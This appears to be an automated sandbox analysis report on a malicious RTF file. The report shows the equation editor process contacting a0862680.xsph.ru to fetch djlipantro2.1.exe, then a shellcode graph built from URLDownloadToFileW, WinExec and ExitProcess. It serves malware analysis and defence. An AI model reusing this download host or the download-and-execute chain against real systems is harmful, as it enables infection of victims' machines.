        File Content Preview:{\rtf1...........{\mcGp4857357 \[}.{\385454352\object21516869\objocx85192904\objw4845\objh2162{\objupdate39424213942421\*\objdata393788{\*\auldb4040177 \bin0000000\523498173665703113}.{\*\fUserDrawn941359336 \bin00000\371920104910354311}.bf554a1a020000000
        Icon Hash:2764a3aaaeb7bdbf
        IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
        000000083hno
        TimestampSource PortDest PortSource IPDest IP
        Sep 14, 2023 23:11:36.794719934 CEST4916380192.168.2.22141.8.197.42
        Sep 14, 2023 23:11:36.998891115 CEST8049163141.8.197.42192.168.2.22
        Sep 14, 2023 23:11:36.998984098 CEST4916380192.168.2.22141.8.197.42
        Sep 14, 2023 23:11:37.002830982 CEST4916380192.168.2.22141.8.197.42
        Sep 14, 2023 23:11:37.206782103 CEST8049163141.8.197.42192.168.2.22
        Sep 14, 2023 23:11:37.207340956 CEST8049163141.8.197.42192.168.2.22
        Sep 14, 2023 23:11:37.207408905 CEST4916380192.168.2.22141.8.197.42
        Sep 14, 2023 23:11:37.207412004 CEST8049163141.8.197.42192.168.2.22
        Sep 14, 2023 23:11:37.207459927 CEST4916380192.168.2.22141.8.197.42
        Sep 14, 2023 23:11:37.207556009 CEST4916380192.168.2.22141.8.197.42
        Sep 14, 2023 23:11:37.412945986 CEST8049163141.8.197.42192.168.2.22
        TimestampSource PortDest PortSource IPDest IP
        Sep 14, 2023 23:11:36.306868076 CEST5291753192.168.2.228.8.8.8
        Sep 14, 2023 23:11:36.777415037 CEST53529178.8.8.8192.168.2.22
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Sep 14, 2023 23:11:36.306868076 CEST192.168.2.228.8.8.80x926Standard query (0)a0862680.xsph.ruA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Sep 14, 2023 23:11:36.777415037 CEST8.8.8.8192.168.2.220x926No error (0)a0862680.xsph.ru141.8.197.42A (IP address)IN (0x0001)false
        • a0862680.xsph.ru
        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.2249163141.8.197.4280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        TimestampkBytes transferredDirectionData
        Sep 14, 2023 23:11:37.002830982 CEST1OUTGET /djlipantro2.1.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: a0862680.xsph.ru
        Connection: Keep-Alive
        Sep 14, 2023 23:11:37.207340956 CEST1INHTTP/1.1 400 Bad Request
        Server: openresty
        Date: Thu, 14 Sep 2023 21:11:37 GMT
        Content-Type: text/html
        Content-Length: 556
        Connection: close
        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:23:11:33
        Start date:14/09/2023
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13fee0000
        File size:1'423'704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:false

        Target ID:2
        Start time:23:11:34
        Start date:14/09/2023
        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        Imagebase:0x400000
        File size:543'304 bytes
        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        Target ID:5
        Start time:23:11:54
        Start date:14/09/2023
        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        Imagebase:0x400000
        File size:543'304 bytes
        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:false

        Reset < >

          Execution Graph

          Execution Coverage:24.9%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:55.6%
          Total number of Nodes:99
          Total number of Limit Nodes:3
          execution_graph 345 2b66b35 346 2b66b37 345->346 357 2b66b4a LoadLibraryW 346->357 348 2b66b3c 368 2b66bc9 URLDownloadToFileW 348->368 350 2b66b75 URLDownloadToFileW 374 2b66be6 350->374 378 2b66b64 357->378 359 2b66b51 360 2b66bc9 4 API calls 359->360 361 2b66b75 URLDownloadToFileW 360->361 363 2b66be6 3 API calls 361->363 365 2b66bd2 363->365 364 2b66c49 364->348 365->364 388 2b66c14 365->388 369 2b66be6 3 API calls 368->369 370 2b66bd2 368->370 369->370 371 2b66c49 370->371 372 2b66c14 3 API calls 370->372 371->350 373 2b66c0c 372->373 375 2b66be9 374->375 376 2b66c14 3 API calls 375->376 377 2b66c0c 376->377 379 2b66b67 378->379 380 2b66bc9 4 API calls 379->380 381 2b66b75 URLDownloadToFileW 380->381 383 2b66be6 3 API calls 381->383 385 2b66bd2 383->385 384 2b66c49 384->359 385->384 386 2b66c14 3 API calls 385->386 387 2b66c0c 386->387 389 2b66c17 WinExec 388->389 394 2b66c34 389->394 391 2b66c28 392 2b66c0c 391->392 393 2b66c37 ExitProcess 391->393 395 2b66c37 ExitProcess 394->395 398 2b66aa1 ExitProcess 413 2b66aba 398->413 400 2b66aad 402 2b66b0f 400->402 404 2b66ae3 400->404 429 2b66afd 400->429 403 2b66bc9 4 API calls 402->403 405 2b66b75 URLDownloadToFileW 403->405 404->402 441 2b66b35 404->441 408 2b66be6 3 API calls 405->408 409 2b66bd2 408->409 410 2b66c49 409->410 411 2b66c14 3 API calls 409->411 412 2b66c0c 411->412 414 2b66ac0 413->414 453 2b66ad6 414->453 416 2b66ac7 417 2b66afd 9 API calls 416->417 418 2b66b0f 416->418 420 2b66ae3 416->420 417->420 419 2b66bc9 4 API calls 418->419 421 2b66b75 URLDownloadToFileW 419->421 420->418 422 2b66b35 8 API calls 420->422 424 2b66be6 3 API calls 421->424 422->418 425 2b66bd2 424->425 426 2b66c49 425->426 427 2b66c14 3 API calls 425->427 426->400 428 2b66c0c 427->428 430 2b66b00 429->430 431 2b66b35 8 API calls 430->431 432 2b66b0f 431->432 433 2b66bc9 4 API calls 432->433 434 2b66b75 URLDownloadToFileW 433->434 436 2b66be6 3 API calls 434->436 437 2b66bd2 436->437 438 2b66c49 437->438 439 2b66c14 3 API calls 437->439 438->404 440 2b66c0c 439->440 442 2b66b37 441->442 443 2b66b4a 7 API calls 442->443 444 2b66b3c 443->444 445 2b66bc9 4 API calls 444->445 446 2b66b75 URLDownloadToFileW 445->446 448 2b66be6 3 API calls 446->448 449 2b66bd2 448->449 450 2b66c49 449->450 451 2b66c14 3 API calls 449->451 450->402 452 2b66c0c 451->452 454 2b66adc 453->454 455 2b66afd 9 API calls 454->455 457 2b66ae3 455->457 456 2b66bc9 4 API calls 459 2b66b75 URLDownloadToFileW 456->459 458 2b66b35 8 API calls 457->458 462 2b66b0f 457->462 458->462 461 2b66be6 3 API calls 459->461 463 2b66bd2 461->463 462->456 464 2b66c49 463->464 465 2b66c14 3 API calls 463->465 464->416 466 2b66c0c 465->466 396 2b66c3b GetPEB 397 2b66c49 396->397

          Callgraph

          • Executed
          • Not Executed
          • Opacity -> Relevance
          • Disassembly available
          callgraph 0 Function_02AF4E2F 1 Function_02B66A56 2 Function_02B66AD6 3 Function_02B66C14 2->3 5 Function_02B66CB4 2->5 6 Function_02B66B35 2->6 8 Function_02B66AFD 2->8 12 Function_02B66BE6 2->12 14 Function_02B66C63 2->14 18 Function_02B66BC9 2->18 4 Function_02B66C34 3->4 6->3 6->12 6->14 17 Function_02B66B4A 6->17 6->18 7 Function_02B6693C 8->3 8->6 8->12 8->14 8->18 9 Function_02B66ABA 9->2 9->3 9->5 9->6 9->8 9->12 9->14 9->18 10 Function_02B66C3B 10->14 11 Function_02B66A18 12->3 13 Function_02B66B64 13->3 13->12 13->14 13->18 15 Function_02AF4E19 16 Function_02B66AA1 16->3 16->6 16->8 16->9 16->12 16->14 16->18 17->3 17->12 17->13 17->14 17->18 18->3 18->12 18->14

          Control-flow Graph

          APIs
          • LoadLibraryW.KERNEL32(02B66B3C), ref: 02B66B4A
            • Part of subcall function 02B66B64: URLDownloadToFileW.URLMON(00000000,02B66B75,?,00000000,00000000), ref: 02B66BCB
          Memory Dump Source
          • Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadFileLibraryLoad
          • String ID:
          • API String ID: 2776762486-0
          • Opcode ID: c32c991e46d75e9b8831d816618ae35a3fd0dc8ba44dbde99203679b3f3417fc
          • Instruction ID: 642028eeb3e9ef2d6767b13674fe8cdbd939947464dd8bada1a3ddd2b27deec9
          • Opcode Fuzzy Hash: c32c991e46d75e9b8831d816618ae35a3fd0dc8ba44dbde99203679b3f3417fc
          • Instruction Fuzzy Hash: AE217CA180C7C26FD722A7704D2EB65BF696B93604F1D8ACEA1C10A0E3A29C9105C767
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 28 2b66c14-2b66c29 WinExec call 2b66c34 32 2b66c94-2b66c98 28->32 33 2b66c2b 28->33 36 2b66c9c 32->36 37 2b66c9a 32->37 34 2b66c7d 33->34 35 2b66c2d 33->35 41 2b66c85-2b66c89 34->41 42 2b66c7f-2b66c83 34->42 38 2b66c9e-2b66ca0 35->38 39 2b66c2f-2b66c39 ExitProcess 35->39 36->38 40 2b66ca2-2b66cab 36->40 37->38 43 2b66cb0-2b66cb1 38->43 48 2b66c74-2b66c77 40->48 49 2b66cad 40->49 41->38 47 2b66c8b-2b66c8f 41->47 42->41 46 2b66c91 42->46 46->32 47->38 47->46 48->40 51 2b66c79 48->51 49->43 51->34
          APIs
          • WinExec.KERNEL32(?,00000001), ref: 02B66C21
            • Part of subcall function 02B66C34: ExitProcess.KERNELBASE(00000000), ref: 02B66C39
          Memory Dump Source
          • Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd
          Similarity
          • API ID: ExecExitProcess
          • String ID:
          • API String ID: 4112423671-0
          • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
          • Instruction ID: 91711e65ab7f940517ac04665415d8f50b9b0ef167af19fedf825ffba9083d7d
          • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
          • Instruction Fuzzy Hash: 22F02299508A8212CB303724885D7BA2B6FEFA5318FC899D79A9188045D66CE0C3C619
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 52 2b66ad6-2b66ae4 call 2b66cb4 call 2b66afd 57 2b66b56-2b66b5d 52->57 58 2b66ae6-2b66aeb 52->58 61 2b66b5e-2b66b67 57->61 58->57 60 2b66aed 58->60 60->61 62 2b66aef-2b66af3 60->62 63 2b66b69-2b66bdd call 2b66bc9 URLDownloadToFileW call 2b66be6 61->63 64 2b66af5 62->64 65 2b66b48 62->65 83 2b66bdf 63->83 84 2b66c4b-2b66c53 call 2b66c63 63->84 64->63 67 2b66af7-2b66b45 call 2b66b35 64->67 65->57 67->65 87 2b66be1-2b66be2 83->87 88 2b66c4a 83->88 89 2b66c58-2b66c5a 84->89 87->89 90 2b66be4-2b66c0d call 2b66c14 87->90 88->84 91 2b66c5c-2b66c60 89->91 92 2b66c49 89->92 92->84
          APIs
          • URLDownloadToFileW.URLMON(00000000,02B66B75,?,00000000,00000000), ref: 02B66BCB
          Memory Dump Source
          • Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadFile
          • String ID:
          • API String ID: 1407266417-0
          • Opcode ID: c4f0c45c06c77ba7534c59ad10f5018062492aa266157aa7298a1fb34482a6d1
          • Instruction ID: a67e12ba7d7f2aa1c95219698d6a56d7c7ec3e105b0b783652897ec24abe8979
          • Opcode Fuzzy Hash: c4f0c45c06c77ba7534c59ad10f5018062492aa266157aa7298a1fb34482a6d1
          • Instruction Fuzzy Hash: E341C1A280D7C26FD722A7704D6EB65BF29AB53604F1DCACE91C50A0E3E39C9105C757
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 96 2b66b64-2b66bdd call 2b66bc9 URLDownloadToFileW call 2b66be6 108 2b66bdf 96->108 109 2b66c4b-2b66c53 call 2b66c63 96->109 111 2b66be1-2b66be2 108->111 112 2b66c4a 108->112 113 2b66c58-2b66c5a 109->113 111->113 114 2b66be4-2b66c0d call 2b66c14 111->114 112->109 115 2b66c5c-2b66c60 113->115 116 2b66c49 113->116 116->109
          Memory Dump Source
          • Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadFile
          • String ID:
          • API String ID: 1407266417-0
          • Opcode ID: fd1079497f7d2061c9caf18006afd60492d999edea779c3c971564c0b513ec8d
          • Instruction ID: 48a23cd8842a33ff277f394665eed1e58a65bbc714a642384348d18d3756daf8
          • Opcode Fuzzy Hash: fd1079497f7d2061c9caf18006afd60492d999edea779c3c971564c0b513ec8d
          • Instruction Fuzzy Hash: 31215BA280C3C26FD722A7704C2EB65BF655F93604F1DCACEA1C10E0E3E2AC9105C756
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 120 2b66bc9-2b66bcb URLDownloadToFileW 121 2b66bd2-2b66bdd 120->121 122 2b66bcd call 2b66be6 120->122 123 2b66bdf 121->123 124 2b66c4b-2b66c53 call 2b66c63 121->124 122->121 126 2b66be1-2b66be2 123->126 127 2b66c4a 123->127 128 2b66c58-2b66c5a 124->128 126->128 129 2b66be4-2b66c0d call 2b66c14 126->129 127->124 130 2b66c5c-2b66c60 128->130 131 2b66c49 128->131 131->124
          APIs
          • URLDownloadToFileW.URLMON(00000000,02B66B75,?,00000000,00000000), ref: 02B66BCB
          Memory Dump Source
          • Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadFile
          • String ID:
          • API String ID: 1407266417-0
          • Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
          • Instruction ID: bea3d98bbed28ca3dcd0d6a4274961228415c226ad81d84734f81fea8692582a
          • Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
          • Instruction Fuzzy Hash: AF118871508B426BCB24E750894DFBABBAFEB92710F50C1DAE640490C5E36CE482C229
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 135 2b66c34-2b66c39 ExitProcess
          APIs
          • ExitProcess.KERNELBASE(00000000), ref: 02B66C39
          Memory Dump Source
          • Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd
          Similarity
          • API ID: ExitProcess
          • String ID:
          • API String ID: 621844428-0
          • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
          • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
          • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
          • Instruction Fuzzy Hash:
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 137 2b66c3b-2b66c46 GetPEB 138 2b66c49-2b66c5a call 2b66c63 137->138 142 2b66c5c-2b66c60 138->142
          Memory Dump Source
          • Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
          • Instruction ID: a314341c365df099c7bfa0b6717c6cccfe4c57876970b4459e2bc8ace50c432e
          • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
          • Instruction Fuzzy Hash: F5D09E71211902DFD305DF05D984E66F36BFFD4611B14D2A9D5044B619D738EC91CA94
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 143 2b66aa1-2b66ac8 ExitProcess call 2b66aba 146 2b66b1b-2b66b36 143->146 147 2b66acb 143->147 154 2b66b38-2b66b3e 146->154 149 2b66b3c-2b66b3d 147->149 150 2b66acd-2b66ad0 147->150 152 2b66b40-2b66b45 149->152 153 2b66ad3 150->153 150->154 155 2b66b48 152->155 153->155 156 2b66ad5-2b66adc 153->156 154->152 157 2b66b56-2b66b5d 155->157 158 2b66ae3-2b66ae4 156->158 159 2b66ade call 2b66afd 156->159 162 2b66b5e-2b66b67 157->162 158->157 161 2b66ae6-2b66aeb 158->161 159->158 161->157 163 2b66aed 161->163 164 2b66b69-2b66bdd call 2b66bc9 URLDownloadToFileW call 2b66be6 162->164 163->162 165 2b66aef-2b66af3 163->165 180 2b66bdf 164->180 181 2b66c4b-2b66c53 call 2b66c63 164->181 165->155 167 2b66af5 165->167 167->164 169 2b66af7-2b66b18 call 2b66b35 167->169 169->146 183 2b66be1-2b66be2 180->183 184 2b66c4a 180->184 185 2b66c58-2b66c5a 181->185 183->185 186 2b66be4-2b66c0d call 2b66c14 183->186 184->181 187 2b66c5c-2b66c60 185->187 188 2b66c49 185->188 188->181
          APIs
          • ExitProcess.KERNELBASE(02B66A8F), ref: 02B66AA1
          Memory Dump Source
          • Source File: 00000002.00000002.341788624.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_2ae0000_EQNEDT32.jbxd
          Similarity
          • API ID: ExitProcess
          • String ID:
          • API String ID: 621844428-0
          • Opcode ID: 22cad5f1c2a3025732e40a056304bbea983aa5471109b1622f5e937056d2a4b5
          • Instruction ID: faba6aefda9aecca2796f3302f41ad8fb4ddc6f2dafffa7326060c24814f3a2a
          • Opcode Fuzzy Hash: 22cad5f1c2a3025732e40a056304bbea983aa5471109b1622f5e937056d2a4b5
          • Instruction Fuzzy Hash: 641126A640EBC29FC3126B701EAF1A5BF29BB1360431D85CFC1D44A1A3E35D960AC797
          Uniqueness

          Uniqueness Score: -1.00%